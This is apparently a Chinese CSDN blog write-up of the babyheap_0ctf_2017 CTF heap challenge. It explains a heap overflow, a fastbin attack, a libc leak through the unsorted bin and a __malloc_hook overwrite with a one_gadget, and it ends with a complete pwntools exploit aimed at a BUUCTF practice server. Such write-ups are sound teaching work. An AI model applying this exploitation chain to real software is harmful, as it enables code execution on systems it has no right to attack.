我又pwn啦——*刷题篇 babyheap_0ctf_2017

最新推荐文章于 2024-05-11 09:52:27 发布
最新推荐文章于 2024-05-11 09:52:27 发布
阅读量622 收藏
点赞数 1
分类专栏: buuctf刷题记录 文章标签: 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64195960/article/details/126042832
版权

前言:这是我uaf后又一道正儿八经的堆题,这道题目的漏洞主要是fastbin attack和一些做堆提新的知识,捣鼓了快一周,看了好多师傅的博客复现总结了一下,现在记录一下。有不对的地方请师傅们指正!

一、例行checksec

保护全开

二、ida反编译

1)main函数

里面有一个菜单函数

 

2)allocate

3)fill

4)free

5)dump

三、利用思路

1)利用角度

step1我们看fill函数

发现在输入数据时只检查了数据大小的下界没有检查上界,因此这里存在堆溢出漏洞,可以对堆内数据进行改写

2)利用过程

我就对着下面的完整exp一步一步写了,注意index(序号)和chunk ?中“?”和index不一定是对应的

step0 准备工作

对于有菜单的题目,这种准备工作要做好

def cmd(index):
	p.sendlineafter('Command: ',str(index))

def allocate(size):
#cmd('1')
	p.sendlineafter('Command: ','1')
	p.sendlineafter('Size: ',str(size))

def fill(index,content):
	cmd('2')
	p.sendlineafter('Index: ',str(index))
	p.sendlineafter('Size: ',str(len(content)))
	p.sendlineafter('Content: ',content)

def free(index):
	cmd('3')
	p.sendlineafter('Index: ',str(index))

def dump(index):
	cmd('4')
	p.sendlineafter('Index: ',str(index))

step1 allocate四个fastbin和一个smallbin,并free掉1和2

allocate(0x10) #chunk0
allocate(0x10) #chunk1
allocate(0x10) #chunk2
allocate(0x10) #chunk3
allocate(0x60) #chunk4
free(1)
free(2)

这里的prev size记录的是上个free chunk的大小,如果上一个是malloced chunk,这个字段就没有什么用了,但是字段还在。

step2 修改chunk 2

下面这个师傅们自己从gdb中看内存可能会更直观一点

第一步fill就看下面画的那张图应该可以理解,前面都是小心翼翼地保持原状,最终是为了修改chunk2的user段首字节,注意因为chunk2已经被free掉了,此时它user段的首字节是fd,我们修改了它的末字节为0x80。

第二步fill是为了修改chunk4的size段,将其修改为0x21(改为和我们之前chunk 2一样的大小),因为fastbin的一条链上chunk的size是相同的,我们修改chunk2的fd到chunk4,fastbin会默认chunk4也是相同大小的fastbin,因此会进行检查,我们需要修改它的size大小来绕过检查。

Q: 为啥子我不直接往chunk2里面的user里面写呢?

A:因为它被free辣!fill函数只能往还在的chunk里写,所以需要用上面提到的堆溢出改写

Q: 为什么最后是p8?为什么是0x80?

A:因为我们的目的是将chunk2的fd改写到chunk4的位置(至于为什么这样请师傅们向后看),这样未释放的chunk4加入了bin中。因为两个chunk的地址只差在末尾一个字节,并且chunk4的末字节是0x80

payload = p64(0)*3
payload+= p64(0x21)
payload+= p64(0)*3
payload+= p64(0x21)
payload+= p8(0x80)   #这一行是关键
fill(0,payload)


payload = p64(0)*3
payload+= p64(0x21)
fill(3,payload)

pwndbg> x/50gx 0x5614ee1f6000
0x5614ee1f6000:	0x0000000000000000	0x0000000000000021
0x5614ee1f6010:	0x0000000000000000	0x0000000000000000
0x5614ee1f6020:	0x0000000000000000	0x0000000000000021
0x5614ee1f6030:	0x0000000000000000	0x0000000000000000
0x5614ee1f6040:	0x0000000000000000	0x0000000000000021
0x5614ee1f6050:	0x00005614ee1f6020	0x0000000000000000   #chunk2的fd
0x5614ee1f6060:	0x0000000000000000	0x0000000000000021
0x5614ee1f6070:	0x0000000000000000	0x0000000000000000
0x5614ee1f6080:	0x0000000000000000	0x0000000000000091   #chunk4的位置
0x5614ee1f6090:	0x0000000000000000	0x0000000000000000
0x5614ee1f60a0:	0x0000000000000000	0x0000000000000000
0x5614ee1f60b0:	0x0000000000000000	0x0000000000000000
0x5614ee1f60c0:	0x0000000000000000	0x0000000000000000
0x5614ee1f60d0:	0x0000000000000000	0x0000000000000000
0x5614ee1f60e0:	0x0000000000000000	0x0000000000000000
0x5614ee1f60f0:	0x0000000000000000	0x0000000000000000
0x5614ee1f6100:	0x0000000000000000	0x0000000000000000
0x5614ee1f6110:	0x0000000000000000	0x0000000000020ef1
0x5614ee1f6120:	0x0000000000000000	0x0000000000000000
0x5614ee1f6130:	0x0000000000000000	0x0000000000000000
0x5614ee1f6140:	0x0000000000000000	0x0000000000000000
0x5614ee1f6150:	0x0000000000000000	0x0000000000000000
0x5614ee1f6160:	0x0000000000000000	0x0000000000000000
0x5614ee1f6170:	0x0000000000000000	0x0000000000000000
0x5614ee1f6180:	0x0000000000000000	0x0000000000000000

step3 将chunk1 chunk2重新分配回来 修改chunk4的size回到0x91

两次allocate先将,chunk4和chunk2回到原位,由于fastbin是后入先出(LIFO) ,所以index=1的地方是chunk2,index=2的地方是chunk4,然后修改chunk4的size字段改回0x91的smallbin的形式

注意:这样我们index 2和index 4都是chunk 4了

allocate(0x10)
allocate(0x10)

fill(1,'aaaa')
fill(2,'bbbb')
payload = p64(0)*3
payload+= p64(0x91)
fill(3,payload)

step4 dump出地址

第一步先allocate(0x80)(我们叫它为chunk5)是为了防止chunk4与top chunk合并

然后将chunk4丢入unsorted bin

有一个小知识:就是如果 usortbin 只有一个 bin ,它的 fd 和 bk 指针会指向同一个地址(unsorted bin 链表的头部),这个地址为 main_arena + 0x58

还有一个小知识:在gdb中我们可以通过magic命令找到malloc__hook和libc基地址的偏移为0x3c4b10

libc基地址的计算:

  1. dump(2)就是解析chunk4的user段也就是其fd和bk,得到的是main_arena+0x58的地址。
  2. strip() 方法用于移除字符串头尾指定的字符(默认为空格或换行符)或字符序列。
  3. ljust就是讲所得补齐8字节,缺少的就用'\x00'补上
  4. 0x3c4b78的由来,减去0x58得到main_arena地址(因为刚才查看了main_arena附近的地址,知道malloc__hook和main_arena偏移为0x10),再减0x10得到malloc__hook地址(我们用magic得到了malloc__hook和libc的偏移),最后减去malloc__hook和libc的偏移即为libc基地址

简单点就是

0x58+0x10+0x3c4b10

allocate(0x80) # index5 chunk5
free(4)

libc_base = u64(dump(2)[:8].strip().ljust(8,b'\x00'))-0x3c4b78
log.info("libc_base:"+hex(libc_base))

step5 伪造一个chunk

我们需要在allocate回来的chunk6(index4)后伪造一个fake chunk,然后需要的大小要在0x60-0x7f之间,我们找到的位置是0x0x7fa8994e6aed,然后要算出与libcbase的偏移是0x3c4aed。

allocate(0x60) #index4 chunk6
free(4)

payload = p64(libc_base+0x3c4aed)
fill(2,payload)

step6 利用onegadget获得shell

因为找到的合适的大小的位置与malloc__hook的偏移为19,所以要对齐内存(p8*3+p64*2)

进行allocate之前需要检查malloc__hook函数的内容,如果为0,就跳过此步骤,如果不为0,就跳转到此部分执行。

allocate(0x60) // index4 chunk6
allocate(0x60) //chunk6所指向的fake chunk #index6 fake chunk

payload = p8(0)*3
payload += p64(0)*2 
payload += p64(libc_base+0x4526a) //0x4526a是one_gadget的一个地址
fill(6, payload)

allocate(255)
p.interactive()

四、完整exp

from pwn import *

flag = 1
if(flag == 1):
	p = remote('node4.buuoj.cn',25136)
else: 
	p = process('./123')
	
#gdb.attach(p)

def cmd(index):
	p.sendlineafter('Command: ',str(index))

def allocate(size):
#cmd('1')
	p.sendlineafter('Command: ','1')
	p.sendlineafter('Size: ',str(size))

def fill(index,content):
	cmd('2')
	p.sendlineafter('Index: ',str(index))
	p.sendlineafter('Size: ',str(len(content)))
	p.sendlineafter('Content: ',content)

def free(index):
	cmd('3')
	p.sendlineafter('Index: ',str(index))

def dump(index):
	cmd('4')
	p.sendlineafter('Index: ',str(index))


	
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x60)
free(1)
free(2)



payload = p64(0)*3
payload+= p64(0x21)
payload+= p64(0)*3
payload+= p64(0x21)
payload+= p8(0x80)
fill(0,payload)


payload = p64(0)*3
payload+= p64(0x21)
fill(3,payload)


allocate(0x10)
allocate(0x10)

fill(1,'aaaa')
fill(2,'bbbb')
payload = p64(0)*3
payload+= p64(0x91)
fill(3,payload)

allocate(0x80)
free(4)

libc_base = u64(dump(2)[:8].strip().ljust(8,b'\x00'))-0x3c4b78
log.info("libc_base:"+hex(libc_base))

allocate(0x60)
free(4)

payload = p64(libc_base+0x3c4aed)
fill(2,payload)

allocate(0x60)
allocate(0x60)

payload = p8(0)*3
payload+= p64(0)*2
payload+= p64(libc_base+0x4526a)
fill(6,payload)

allocate(255)
p.interactive()

五、参考博客

这两位师傅说的很详细,知识点和思路可以看看这两位师傅的博客

绝对详细的babyheap_0ctf_2017题解_eeeeeeeeeeeeeeeea的博客-CSDN博客_babyheap_0ctf_2017

blog.csdn.net/qq_43935969/article/details/115877748

gdb调试的内容可以重点看看这位师傅的博客

[分享]0ctf2017 - babyheap-Pwn-看雪论坛-安全社区|安全招聘|bbs.pediy.com

欢迎师傅们一起学习交流呀!也求大师傅带带

qwq-123
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
babyheap_0_ctf_2017
m0_48127441的博客
04-01 192
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3737
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2735
好家伙,保护全开,根据文件名,可以判断这是一道堆目,了这么久,终于遇到堆目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
2024年最新CTF-PWN学习-为缺少指导的同学而生_ctf pwn(1),学习路线+知识点梳理
最新发布
2401_84264244的博客
05-11 410
还有兄弟不知道网络安全面试可以提前吗?费时一周整理的160+网络安全面试,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
0ctf Babyheap 2017
Bill
03-11 6359
0ctf 2017 BabyHeap 1. 目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
数组分组chunk的一种写法
weixin_30471065的博客
10-11 130
lodash的_.chunk函数可以将数组按照数量分成若干组, 例如: const data = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]; const groupByNum = 3; 会分成 [ [1,2,3], [4,5,6], [7,8,9], [10,11] ] 下面是一种 map + slice 的写法 const...
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn学习资料整理——ROP技术(pwn_rop2)
08-30
pwn学习资料整理——ROP技术(pwn_rop2)
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone https://github.com/ray-cp/pwn_debug.git cd pwn_debug sudo ...
0ctf-2017-pwn-char-libc.so
02-05
2017年0ctf的pwnchar的libc库文件
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问
绝对详细的babyheap_0ctf_2017
xieyichensss的博客
04-24 994
这是我第一次做堆,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
2017/2018-0ctf-babyheap-writeup
【xiaoxiaorenwu's blog】
04-07 756
因为最近2019届0ctf-tctf开始了,想去水一水,特别把2018的babyheap和2017的babyheap做了一下汲取一下经验,感觉两类型相似,大致思路相同,2018比2017的利用条件更加苛刻一些。所以把两个目放在一起来写,有助于加深对fastbin_attack的理解,和提高知识运用的灵活性。 首先提供两道目的二进制文件:2017_0ctf_babyheap 2018...
NSSCTF PWN方向记录
CyhStyrl的博客
04-03 625
流程:先添加note 0 再删除note 0 再添加note 1 并修改note1 内容为payload note1所在地址空间实则为note 0 所在位置(free后指针没有置为null 存在UAF漏洞)
攻防世界PWN之Babyheap(null off by one)
seaaseesa的博客
11-20 2042
Babyheap(null off by one) 本用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
fastbin attack攻击中关于 malloc__hook
半岛铁盒的博客
07-20 533
概述 在程序中设置钩子,用来在malloc,,对其进行检查,可以看到对应的函数调用后的地址是什么。 malloc__hook 也位于libc中的data段 它是一个地址 当调用 malloc 的时候 它会发生跳转到malloc__hook 所指向的地址 当我们把malloc__hook 所指向的地址 改为 system(“bin/sh”) 再次调用 malloc 的时候 就会发生跳转到 system() 处 操作 上述前提是获取 malloc__hook 的地址 有一个固定的偏移 (libc2.23 //
pwn学习总结(五) —— 堆溢出经典型整理
qq_41988448的博客
12-29 1969
pwn学习总结(九) —— 经典目整理三(持续更新)fastbin + 栈溢出fastbin + 函数构造 fastbin + 栈溢出 目:fastbin 环境:ubuntu 16.04 下载地址:https://pan.baidu.com/s/1R6-BVR91Io_ZVPDDpBcCkA 提取码:r7e5 查看程序防护: 使用ida进行反编译: 已知条件: 可以得到mai...
(补)HITCON 2018 PWN baby_tcache超详细讲解
hollk’s blog
05-19 1568
好久没有更新了,这道利用的是IO_FILE输出的方式进行泄露libc地址,需要结合着上一篇[好好说话之IO_FILE利用(1):利用_IO_2_1_stdout泄露libc]一起来看,最近参加了安网杯,其中的pwn也是利用IO_FILE进行输出的,很幸运获得的第二名的成绩,大佬带飞~ 得抓紧把好好说话系列写完啦~
强网杯2021 pwn解析——babypwn
CoLin的pwn小屋
07-26 743
强网杯2021 pwn回顾——babypwn
ctf竞赛权威指南pwn篇 pdf
11-05
《CTF竞赛权威指南Pwn篇》是一本关于CTF(Capture The Flag)竞赛中的Pwn(利用漏洞攻击代码)目的权威指南。CTF竞赛是一种网络安全竞赛形式,旨在通过解决各种安全相关的难来锻炼和提高参赛者的技能。 Pwn篇是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值